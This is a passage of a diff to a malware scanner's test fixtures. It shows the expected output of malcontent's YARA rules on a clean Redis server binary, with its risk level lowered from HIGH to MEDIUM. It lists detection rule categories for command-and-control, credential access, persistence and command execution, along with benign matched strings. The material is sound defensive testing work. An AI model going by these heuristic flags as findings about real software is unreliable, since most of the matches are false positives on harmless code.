[141.14.22.331](https://github.com/search?q=141.14.22.331&type=code)
[223.264.47.556](https://github.com/search?q=223.264.47.556&type=code)
[264.47.556.673](https://github.com/search?q=264.47.556.673&type=code)
[284.411.537.896](https://github.com/search?q=284.411.537.896&type=code)
[411.537.896.621](https://github.com/search?q=411.537.896.621&type=code)
[47.556.673.848](https://github.com/search?q=47.556.673.848&type=code)
[556.673.848.284](https://github.com/search?q=556.673.848.284&type=code)
[673.848.284.411](https://github.com/search?q=673.848.284.411&type=code)
[848.284.411.537](https://github.com/search?q=848.284.411.537&type=code) |
 | MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) |
 | MEDIUM | [c2/addr/php](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/php.yara#http_url_with_php) | accesses hardcoded PHP endpoint | [http://www.fictionbook.org/index.php](http://www.fictionbook.org/index.php) |
 | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) |
diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md
index ec23d2595..77be955cf 100644
--- a/tests/linux/clean/redis-server.aarch64.md
+++ b/tests/linux/clean/redis-server.aarch64.md
@@ -1,52 +1,51 @@ -## linux/clean/redis-server.aarch64 [🟠 HIGH] +## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [impact/degrade/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/linux_paths.yara#linux_critical_system_paths_small_elf) | ELF accesses multiple critical Linux paths | [/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code)
[/sys/devices/system/clocksource/clocksource0](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0&type=code)
[/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code)
[/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | 
[/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | 
[/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
